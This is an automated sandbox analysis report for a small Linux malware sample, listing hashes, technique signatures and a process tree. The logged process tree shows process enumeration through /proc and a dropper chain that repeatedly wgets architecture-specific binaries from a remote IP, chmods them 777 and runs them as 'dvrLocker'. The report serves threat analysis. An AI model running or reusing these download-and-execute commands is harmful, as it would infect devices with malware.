Analysis

  • max time kernel
    13s
  • max time network
    131s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    27/11/2024, 02:39

General

  • Target

    6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown

  • Size

    913B

  • MD5

    c18ef2271ad912c7542293151373ffa0

  • SHA1

    65fb65c17671657fc431173051fe794c6c63007d

  • SHA256

    6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b

  • SHA512

    fb9a3ec37ee5f8f71b343285f034a6c27520fdc6525b217b411023b4c9741282cd36354442853caa50a2d2fe54dfb6e8f8453f36cdd773573435062f82bcdfc9

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 21 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 21 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
    /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
    1⤵
    • Writes file to tmp directory
    PID:1480
    • /bin/ls
      ls -l /proc/1/exe
      2⤵
      • Reads runtime system information
      PID:1481
    • /bin/ls
      ls -l /proc/10/exe
      2⤵
        PID:1483
      • /bin/ls
        ls -l /proc/1012/exe
        2⤵
          PID:1484
        • /bin/ls
          ls -l /proc/1017/exe
          2⤵
            PID:1485
          • /bin/ls
            ls -l /proc/1041/exe
            2⤵
              PID:1486
            • /bin/ls
              ls -l /proc/1047/exe
              2⤵
                PID:1487
              • /bin/ls
                ls -l /proc/1061/exe
                2⤵
                  PID:1488
                • /bin/ls
                  ls -l /proc/1065/exe
                  2⤵
                  • Reads runtime system information
                  PID:1489
                • /bin/ls
                  ls -l /proc/1067/exe
                  2⤵
                    PID:1490
                  • /bin/ls
                    ls -l /proc/1070/exe
                    2⤵
                      PID:1491
                    • /bin/ls
                      ls -l /proc/1077/exe
                      2⤵
                      • Reads runtime system information
                      PID:1492
                    • /bin/ls
                      ls -l /proc/108/exe
                      2⤵
                        PID:1494
                      • /bin/ls
                        ls -l /proc/1084/exe
                        2⤵
                          PID:1497
                        • /bin/ls
                          ls -l /proc/1088/exe
                          2⤵
                            PID:1498
                          • /bin/ls
                            ls -l /proc/1097/exe
                            2⤵
                              PID:1499
                            • /bin/ls
                              ls -l /proc/11/exe
                              2⤵
                                PID:1500
                              • /bin/ls
                                ls -l /proc/1112/exe
                                2⤵
                                • Reads runtime system information
                                PID:1501
                              • /bin/ls
                                ls -l /proc/1113/exe
                                2⤵
                                  PID:1502
                                • /bin/ls
                                  ls -l /proc/1121/exe
                                  2⤵
                                    PID:1503
                                  • /bin/ls
                                    ls -l /proc/1125/exe
                                    2⤵
                                    • Reads runtime system information
                                    PID:1504
                                  • /bin/ls
                                    ls -l /proc/1129/exe
                                    2⤵
                                    • Reads runtime system information
                                    PID:1505
                                  • /bin/ls
                                    ls -l /proc/1134/exe
                                    2⤵
                                    • Reads runtime system information
                                    PID:1506
                                  • /bin/ls
                                    ls -l /proc/1138/exe
                                    2⤵
                                      PID:1507
                                    • /bin/ls
                                      ls -l /proc/1143/exe
                                      2⤵
                                        PID:1508
                                      • /bin/ls
                                        ls -l /proc/1146/exe
                                        2⤵
                                          PID:1509
                                        • /bin/ls
                                          ls -l /proc/1148/exe
                                          2⤵
                                            PID:1510
                                          • /bin/ls
                                            ls -l /proc/1151/exe
                                            2⤵
                                            • Reads runtime system information
                                            PID:1511
                                          • /bin/ls
                                            ls -l /proc/1152/exe
                                            2⤵
                                            • Reads runtime system information
                                            PID:1512
                                          • /bin/ls
                                            ls -l /proc/1154/exe
                                            2⤵
                                              PID:1513
                                            • /bin/ls
                                              ls -l /proc/116/exe
                                              2⤵
                                              • Reads runtime system information
                                              PID:1514
                                            • /bin/ls
                                              ls -l /proc/1162/exe
                                              2⤵
                                              • Reads runtime system information
                                              PID:1515
                                            • /bin/ls
                                              ls -l /proc/1165/exe
                                              2⤵
                                                PID:1516
                                              • /bin/ls
                                                ls -l /proc/1166/exe
                                                2⤵
                                                  PID:1517
                                                • /bin/ls
                                                  ls -l /proc/1168/exe
                                                  2⤵
                                                    PID:1518
                                                  • /bin/ls
                                                    ls -l /proc/1173/exe
                                                    2⤵
                                                      PID:1519
                                                    • /bin/ls
                                                      ls -l /proc/1178/exe
                                                      2⤵
                                                        PID:1520
                                                      • /bin/ls
                                                        ls -l /proc/1182/exe
                                                        2⤵
                                                          PID:1521
                                                        • /bin/ls
                                                          ls -l /proc/1184/exe
                                                          2⤵
                                                          • Reads runtime system information
                                                          PID:1522
                                                        • /bin/ls
                                                          ls -l /proc/1186/exe
                                                          2⤵
                                                            PID:1523
                                                          • /bin/ls
                                                            ls -l /proc/1188/exe
                                                            2⤵
                                                            • Reads runtime system information
                                                            PID:1524
                                                          • /bin/ls
                                                            ls -l /proc/1191/exe
                                                            2⤵
                                                              PID:1525
                                                            • /bin/ls
                                                              ls -l /proc/1194/exe
                                                              2⤵
                                                              • Reads runtime system information
                                                              PID:1526
                                                            • /bin/ls
                                                              ls -l /proc/12/exe
                                                              2⤵
                                                              • Reads runtime system information
                                                              PID:1527
                                                            • /bin/ls
                                                              ls -l /proc/1229/exe
                                                              2⤵
                                                                PID:1528
                                                              • /bin/ls
                                                                ls -l /proc/1239/exe
                                                                2⤵
                                                                  PID:1529
                                                                • /bin/ls
                                                                  ls -l /proc/1250/exe
                                                                  2⤵
                                                                    PID:1530
                                                                  • /bin/ls
                                                                    ls -l /proc/1252/exe
                                                                    2⤵
                                                                      PID:1531
                                                                    • /bin/ls
                                                                      ls -l /proc/1266/exe
                                                                      2⤵
                                                                      • Reads runtime system information
                                                                      PID:1532
                                                                    • /bin/ls
                                                                      ls -l /proc/1285/exe
                                                                      2⤵
                                                                        PID:1533
                                                                      • /bin/ls
                                                                        ls -l /proc/1286/exe
                                                                        2⤵
                                                                        • Reads runtime system information
                                                                        PID:1534
                                                                      • /bin/ls
                                                                        ls -l /proc/1293/exe
                                                                        2⤵
                                                                        • Reads runtime system information
                                                                        PID:1535
                                                                      • /bin/ls
                                                                        ls -l /proc/13/exe
                                                                        2⤵
                                                                          PID:1536
                                                                        • /bin/ls
                                                                          ls -l /proc/130/exe
                                                                          2⤵
                                                                          • Reads runtime system information
                                                                          PID:1538
                                                                        • /bin/ls
                                                                          ls -l /proc/1303/exe
                                                                          2⤵
                                                                          • Reads runtime system information
                                                                          PID:1540
                                                                        • /bin/ls
                                                                          ls -l /proc/1308/exe
                                                                          2⤵
                                                                          • Reads runtime system information
                                                                          PID:1542
                                                                        • /bin/ls
                                                                          ls -l /proc/1319/exe
                                                                          2⤵
                                                                            PID:1543
                                                                          • /bin/ls
                                                                            ls -l /proc/1331/exe
                                                                            2⤵
                                                                              PID:1544
                                                                            • /bin/ls
                                                                              ls -l /proc/1341/exe
                                                                              2⤵
                                                                                PID:1545
                                                                              • /bin/ls
                                                                                ls -l /proc/1348/exe
                                                                                2⤵
                                                                                  PID:1546
                                                                                • /bin/ls
                                                                                  ls -l /proc/1370/exe
                                                                                  2⤵
                                                                                  • Reads runtime system information
                                                                                  PID:1547
                                                                                • /bin/ls
                                                                                  ls -l /proc/14/exe
                                                                                  2⤵
                                                                                  • Reads runtime system information
                                                                                  PID:1548
                                                                                • /bin/ls
                                                                                  ls -l /proc/1469/exe
                                                                                  2⤵
                                                                                    PID:1549
                                                                                  • /bin/ls
                                                                                    ls -l /proc/1475/exe
                                                                                    2⤵
                                                                                      PID:1550
                                                                                    • /bin/ls
                                                                                      ls -l /proc/1476/exe
                                                                                      2⤵
                                                                                        PID:1551
                                                                                      • /bin/ls
                                                                                        ls -l /proc/1477/exe
                                                                                        2⤵
                                                                                        • Reads runtime system information
                                                                                        PID:1552
                                                                                      • /bin/ls
                                                                                        ls -l /proc/1478/exe
                                                                                        2⤵
                                                                                          PID:1553
                                                                                        • /bin/ls
                                                                                          ls -l /proc/1480/exe
                                                                                          2⤵
                                                                                            PID:1554
                                                                                          • /bin/ls
                                                                                            ls -l /proc/15/exe
                                                                                            2⤵
                                                                                              PID:1555
                                                                                            • /bin/ls
                                                                                              ls -l /proc/16/exe
                                                                                              2⤵
                                                                                                PID:1556
                                                                                              • /bin/ls
                                                                                                ls -l /proc/163/exe
                                                                                                2⤵
                                                                                                • Reads runtime system information
                                                                                                PID:1557
                                                                                              • /bin/ls
                                                                                                ls -l /proc/164/exe
                                                                                                2⤵
                                                                                                  PID:1558
                                                                                                • /bin/ls
                                                                                                  ls -l /proc/165/exe
                                                                                                  2⤵
                                                                                                    PID:1559
                                                                                                  • /bin/ls
                                                                                                    ls -l /proc/166/exe
                                                                                                    2⤵
                                                                                                      PID:1560
                                                                                                    • /bin/ls
                                                                                                      ls -l /proc/167/exe
                                                                                                      2⤵
                                                                                                        PID:1561
                                                                                                      • /bin/ls
                                                                                                        ls -l /proc/168/exe
                                                                                                        2⤵
                                                                                                          PID:1562
                                                                                                        • /bin/ls
                                                                                                          ls -l /proc/169/exe
                                                                                                          2⤵
                                                                                                            PID:1563
                                                                                                          • /bin/ls
                                                                                                            ls -l /proc/17/exe
                                                                                                            2⤵
                                                                                                              PID:1564
                                                                                                            • /bin/ls
                                                                                                              ls -l /proc/170/exe
                                                                                                              2⤵
                                                                                                                PID:1565
                                                                                                              • /bin/ls
                                                                                                                ls -l /proc/171/exe
                                                                                                                2⤵
                                                                                                                  PID:1566
                                                                                                                • /bin/ls
                                                                                                                  ls -l /proc/172/exe
                                                                                                                  2⤵
                                                                                                                    PID:1567
                                                                                                                  • /bin/ls
                                                                                                                    ls -l /proc/173/exe
                                                                                                                    2⤵
                                                                                                                    • Reads runtime system information
                                                                                                                    PID:1568
                                                                                                                  • /bin/ls
                                                                                                                    ls -l /proc/174/exe
                                                                                                                    2⤵
                                                                                                                      PID:1571
                                                                                                                    • /bin/ls
                                                                                                                      ls -l /proc/175/exe
                                                                                                                      2⤵
                                                                                                                        PID:1572
                                                                                                                      • /bin/ls
                                                                                                                        ls -l /proc/176/exe
                                                                                                                        2⤵
                                                                                                                          PID:1574
                                                                                                                        • /bin/ls
                                                                                                                          ls -l /proc/177/exe
                                                                                                                          2⤵
                                                                                                                            PID:1575
                                                                                                                          • /bin/ls
                                                                                                                            ls -l /proc/178/exe
                                                                                                                            2⤵
                                                                                                                            • Reads runtime system information
                                                                                                                            PID:1578
                                                                                                                          • /bin/ls
                                                                                                                            ls -l /proc/179/exe
                                                                                                                            2⤵
                                                                                                                            • Reads runtime system information
                                                                                                                            PID:1580
                                                                                                                          • /bin/ls
                                                                                                                            ls -l /proc/18/exe
                                                                                                                            2⤵
                                                                                                                              PID:1581
                                                                                                                            • /bin/ls
                                                                                                                              ls -l /proc/181/exe
                                                                                                                              2⤵
                                                                                                                              • Reads runtime system information
                                                                                                                              PID:1582
                                                                                                                            • /bin/ls
                                                                                                                              ls -l /proc/19/exe
                                                                                                                              2⤵
                                                                                                                              • Reads runtime system information
                                                                                                                              PID:1583
                                                                                                                            • /bin/ls
                                                                                                                              ls -l /proc/2/exe
                                                                                                                              2⤵
                                                                                                                                PID:1584
                                                                                                                              • /bin/ls
                                                                                                                                ls -l /proc/20/exe
                                                                                                                                2⤵
                                                                                                                                  PID:1585
                                                                                                                                • /bin/ls
                                                                                                                                  ls -l /proc/206/exe
                                                                                                                                  2⤵
                                                                                                                                  • Reads runtime system information
                                                                                                                                  PID:1586
                                                                                                                                • /bin/ls
                                                                                                                                  ls -l /proc/207/exe
                                                                                                                                  2⤵
                                                                                                                                    PID:1587
                                                                                                                                  • /bin/ls
                                                                                                                                    ls -l /proc/21/exe
                                                                                                                                    2⤵
                                                                                                                                    • Reads runtime system information
                                                                                                                                    PID:1588
                                                                                                                                  • /bin/ls
                                                                                                                                    ls -l /proc/22/exe
                                                                                                                                    2⤵
                                                                                                                                    • Reads runtime system information
                                                                                                                                    PID:1589
                                                                                                                                  • /bin/ls
                                                                                                                                    ls -l /proc/23/exe
                                                                                                                                    2⤵
                                                                                                                                      PID:1590
                                                                                                                                    • /bin/ls
                                                                                                                                      ls -l /proc/24/exe
                                                                                                                                      2⤵
                                                                                                                                        PID:1591
                                                                                                                                      • /bin/ls
                                                                                                                                        ls -l /proc/25/exe
                                                                                                                                        2⤵
                                                                                                                                          PID:1592
                                                                                                                                        • /bin/ls
                                                                                                                                          ls -l /proc/255/exe
                                                                                                                                          2⤵
                                                                                                                                            PID:1593
                                                                                                                                          • /bin/ls
                                                                                                                                            ls -l /proc/26/exe
                                                                                                                                            2⤵
                                                                                                                                            • Reads runtime system information
                                                                                                                                            PID:1594
                                                                                                                                          • /bin/ls
                                                                                                                                            ls -l /proc/27/exe
                                                                                                                                            2⤵
                                                                                                                                              PID:1595
                                                                                                                                            • /bin/ls
                                                                                                                                              ls -l /proc/276/exe
                                                                                                                                              2⤵
                                                                                                                                                PID:1596
                                                                                                                                              • /bin/ls
                                                                                                                                                ls -l /proc/28/exe
                                                                                                                                                2⤵
                                                                                                                                                  PID:1597
                                                                                                                                                • /bin/ls
                                                                                                                                                  ls -l /proc/29/exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1598
                                                                                                                                                  • /bin/ls
                                                                                                                                                    ls -l /proc/3/exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1599
                                                                                                                                                    • /bin/ls
                                                                                                                                                      ls -l /proc/30/exe
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1600
                                                                                                                                                      • /bin/ls
                                                                                                                                                        ls -l /proc/31/exe
                                                                                                                                                        2⤵
                                                                                                                                                        • Reads runtime system information
                                                                                                                                                        PID:1601
                                                                                                                                                      • /bin/ls
                                                                                                                                                        ls -l /proc/32/exe
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1602
                                                                                                                                                        • /bin/ls
                                                                                                                                                          ls -l /proc/334/exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Reads runtime system information
                                                                                                                                                          PID:1603
                                                                                                                                                        • /bin/ls
                                                                                                                                                          ls -l /proc/336/exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Reads runtime system information
                                                                                                                                                          PID:1604
                                                                                                                                                        • /bin/ls
                                                                                                                                                          ls -l /proc/34/exe
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1605
                                                                                                                                                          • /bin/ls
                                                                                                                                                            ls -l /proc/35/exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1606
                                                                                                                                                            • /bin/ls
                                                                                                                                                              ls -l /proc/36/exe
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1607
                                                                                                                                                              • /bin/ls
                                                                                                                                                                ls -l /proc/4/exe
                                                                                                                                                                2⤵
                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                PID:1608
                                                                                                                                                              • /bin/ls
                                                                                                                                                                ls -l /proc/415/exe
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:1609
                                                                                                                                                                • /bin/ls
                                                                                                                                                                  ls -l /proc/421/exe
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                  PID:1610
                                                                                                                                                                • /bin/ls
                                                                                                                                                                  ls -l /proc/425/exe
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                  PID:1611
                                                                                                                                                                • /bin/ls
                                                                                                                                                                  ls -l /proc/433/exe
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                  PID:1612
                                                                                                                                                                • /bin/ls
                                                                                                                                                                  ls -l /proc/439/exe
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                  PID:1613
                                                                                                                                                                • /bin/ls
                                                                                                                                                                  ls -l /proc/440/exe
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                  PID:1614
                                                                                                                                                                • /bin/ls
                                                                                                                                                                  ls -l /proc/441/exe
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:1615
                                                                                                                                                                  • /bin/ls
                                                                                                                                                                    ls -l /proc/444/exe
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Reads runtime system information
                                                                                                                                                                    PID:1616
                                                                                                                                                                  • /bin/ls
                                                                                                                                                                    ls -l /proc/451/exe
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Reads runtime system information
                                                                                                                                                                    PID:1617
                                                                                                                                                                  • /bin/ls
                                                                                                                                                                    ls -l /proc/457/exe
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1618
                                                                                                                                                                    • /bin/ls
                                                                                                                                                                      ls -l /proc/462/exe
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                      PID:1619
                                                                                                                                                                    • /bin/ls
                                                                                                                                                                      ls -l /proc/464/exe
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                      PID:1620
                                                                                                                                                                    • /bin/ls
                                                                                                                                                                      ls -l /proc/465/exe
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1621
                                                                                                                                                                      • /bin/ls
                                                                                                                                                                        ls -l /proc/466/exe
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:1622
                                                                                                                                                                        • /bin/ls
                                                                                                                                                                          ls -l /proc/468/exe
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                          PID:1623
                                                                                                                                                                        • /bin/ls
                                                                                                                                                                          ls -l /proc/485/exe
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:1624
                                                                                                                                                                          • /bin/ls
                                                                                                                                                                            ls -l /proc/5/exe
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1625
                                                                                                                                                                            • /bin/ls
                                                                                                                                                                              ls -l /proc/515/exe
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                              PID:1626
                                                                                                                                                                            • /bin/ls
                                                                                                                                                                              ls -l /proc/518/exe
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                              PID:1627
                                                                                                                                                                            • /bin/ls
                                                                                                                                                                              ls -l /proc/524/exe
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                              PID:1628
                                                                                                                                                                            • /bin/ls
                                                                                                                                                                              ls -l /proc/532/exe
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:1629
                                                                                                                                                                              • /bin/ls
                                                                                                                                                                                ls -l /proc/544/exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:1630
                                                                                                                                                                                • /bin/ls
                                                                                                                                                                                  ls -l /proc/568/exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                  PID:1631
                                                                                                                                                                                • /bin/ls
                                                                                                                                                                                  ls -l /proc/595/exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                  PID:1632
                                                                                                                                                                                • /bin/ls
                                                                                                                                                                                  ls -l /proc/596/exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:1633
                                                                                                                                                                                  • /bin/ls
                                                                                                                                                                                    ls -l /proc/6/exe
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:1634
                                                                                                                                                                                    • /bin/ls
                                                                                                                                                                                      ls -l /proc/632/exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                      PID:1635
                                                                                                                                                                                    • /bin/ls
                                                                                                                                                                                      ls -l /proc/650/exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:1636
                                                                                                                                                                                      • /bin/ls
                                                                                                                                                                                        ls -l /proc/652/exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:1637
                                                                                                                                                                                        • /bin/ls
                                                                                                                                                                                          ls -l /proc/662/exe
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:1638
                                                                                                                                                                                          • /bin/ls
                                                                                                                                                                                            ls -l /proc/665/exe
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:1639
                                                                                                                                                                                            • /bin/ls
                                                                                                                                                                                              ls -l /proc/670/exe
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                                              PID:1640
                                                                                                                                                                                            • /bin/ls
                                                                                                                                                                                              ls -l /proc/7/exe
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:1641
                                                                                                                                                                                              • /bin/ls
                                                                                                                                                                                                ls -l /proc/708/exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                                                PID:1642
                                                                                                                                                                                              • /bin/ls
                                                                                                                                                                                                ls -l /proc/712/exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                                                PID:1643
                                                                                                                                                                                              • /bin/ls
                                                                                                                                                                                                ls -l /proc/716/exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                                                PID:1644
                                                                                                                                                                                              • /bin/ls
                                                                                                                                                                                                ls -l /proc/78/exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:1645
                                                                                                                                                                                                • /bin/ls
                                                                                                                                                                                                  ls -l /proc/79/exe
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                  PID:1646
                                                                                                                                                                                                • /bin/ls
                                                                                                                                                                                                  ls -l /proc/8/exe
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                  PID:1647
                                                                                                                                                                                                • /bin/ls
                                                                                                                                                                                                  ls -l /proc/80/exe
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                  PID:1648
                                                                                                                                                                                                • /bin/ls
                                                                                                                                                                                                  ls -l /proc/81/exe
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                  PID:1649
                                                                                                                                                                                                • /bin/ls
                                                                                                                                                                                                  ls -l /proc/82/exe
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:1650
                                                                                                                                                                                                  • /bin/ls
                                                                                                                                                                                                    ls -l /proc/83/exe
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:1651
                                                                                                                                                                                                    • /bin/ls
                                                                                                                                                                                                      ls -l /proc/84/exe
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:1652
                                                                                                                                                                                                      • /bin/ls
                                                                                                                                                                                                        ls -l /proc/85/exe
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1653
                                                                                                                                                                                                        • /bin/ls
                                                                                                                                                                                                          ls -l /proc/867/exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                          PID:1654
                                                                                                                                                                                                        • /bin/ls
                                                                                                                                                                                                          ls -l /proc/89/exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:1655
                                                                                                                                                                                                          • /bin/ls
                                                                                                                                                                                                            ls -l /proc/9/exe
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                            PID:1656
                                                                                                                                                                                                          • /bin/ls
                                                                                                                                                                                                            ls -l /proc/917/exe
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1657
                                                                                                                                                                                                            • /bin/ls
                                                                                                                                                                                                              ls -l /proc/934/exe
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:1658
                                                                                                                                                                                                              • /bin/ls
                                                                                                                                                                                                                ls -l /proc/949/exe
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:1659
                                                                                                                                                                                                                • /bin/ls
                                                                                                                                                                                                                  ls -l /proc/962/exe
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:1660
                                                                                                                                                                                                                  • /bin/ls
                                                                                                                                                                                                                    ls -l /proc/968/exe
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:1661
                                                                                                                                                                                                                    • /bin/ls
                                                                                                                                                                                                                      ls -l /proc/98/exe
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:1662
                                                                                                                                                                                                                      • /bin/rm
                                                                                                                                                                                                                        rm -rf /tmp/lib/
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:1663
                                                                                                                                                                                                                        • /bin/rm
                                                                                                                                                                                                                          rm -rf /tmp/lib/dvrLocker
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:1664
                                                                                                                                                                                                                          • /bin/mkdir
                                                                                                                                                                                                                            mkdir /tmp/lib/
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:1665
                                                                                                                                                                                                                            • /usr/bin/wget
                                                                                                                                                                                                                              wget http://45.125.66.90/mpsl -O -
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:1666
                                                                                                                                                                                                                              • /bin/chmod
                                                                                                                                                                                                                                chmod 777 dvrLocker
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • File and Directory Permissions Modification
                                                                                                                                                                                                                                PID:1667
                                                                                                                                                                                                                              • /tmp/lib/dvrLocker
                                                                                                                                                                                                                                ./dvrLocker tplink.new
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:1668
                                                                                                                                                                                                                              • /bin/rm
                                                                                                                                                                                                                                rm -rf mpsl
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:1670
                                                                                                                                                                                                                                • /usr/bin/wget
                                                                                                                                                                                                                                  wget http://45.125.66.90/mips -O -
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • System Network Configuration Discovery
                                                                                                                                                                                                                                  PID:1671
                                                                                                                                                                                                                                • /bin/chmod
                                                                                                                                                                                                                                  chmod 777 dvrLocker
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • File and Directory Permissions Modification
                                                                                                                                                                                                                                  PID:1673
                                                                                                                                                                                                                                • /tmp/lib/dvrLocker
                                                                                                                                                                                                                                  ./dvrLocker tplink.new
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:1674
                                                                                                                                                                                                                                • /bin/rm
                                                                                                                                                                                                                                  rm -rf mips
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • System Network Configuration Discovery
                                                                                                                                                                                                                                  PID:1676
                                                                                                                                                                                                                                • /usr/bin/wget
                                                                                                                                                                                                                                  wget http://45.125.66.90/arm -O -
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:1677
                                                                                                                                                                                                                                  • /bin/chmod
                                                                                                                                                                                                                                    chmod 777 dvrLocker
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • File and Directory Permissions Modification
                                                                                                                                                                                                                                    PID:1678
                                                                                                                                                                                                                                  • /tmp/lib/dvrLocker
                                                                                                                                                                                                                                    ./dvrLocker tplink.new
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:1679
                                                                                                                                                                                                                                  • /bin/rm
                                                                                                                                                                                                                                    rm -rf arm
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:1681
                                                                                                                                                                                                                                    • /usr/bin/wget
                                                                                                                                                                                                                                      wget http://45.125.66.90/arm5 -O -
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:1682
                                                                                                                                                                                                                                      • /bin/chmod
                                                                                                                                                                                                                                        chmod 777 dvrLocker
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • File and Directory Permissions Modification
                                                                                                                                                                                                                                        PID:1683
                                                                                                                                                                                                                                      • /tmp/lib/dvrLocker
                                                                                                                                                                                                                                        ./dvrLocker tplink.new
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:1684
                                                                                                                                                                                                                                      • /bin/rm
                                                                                                                                                                                                                                        rm -rf arm5
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:1686
                                                                                                                                                                                                                                        • /usr/bin/wget
                                                                                                                                                                                                                                          wget http://45.125.66.90/ppc -O -
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:1687
                                                                                                                                                                                                                                          • /bin/chmod
                                                                                                                                                                                                                                            chmod 777 dvrLocker
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • File and Directory Permissions Modification
                                                                                                                                                                                                                                            PID:1688
                                                                                                                                                                                                                                          • /tmp/lib/dvrLocker
                                                                                                                                                                                                                                            ./dvrLocker tplink.new
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            PID:1689
                                                                                                                                                                                                                                          • /bin/rm
                                                                                                                                                                                                                                            rm -rf ppc
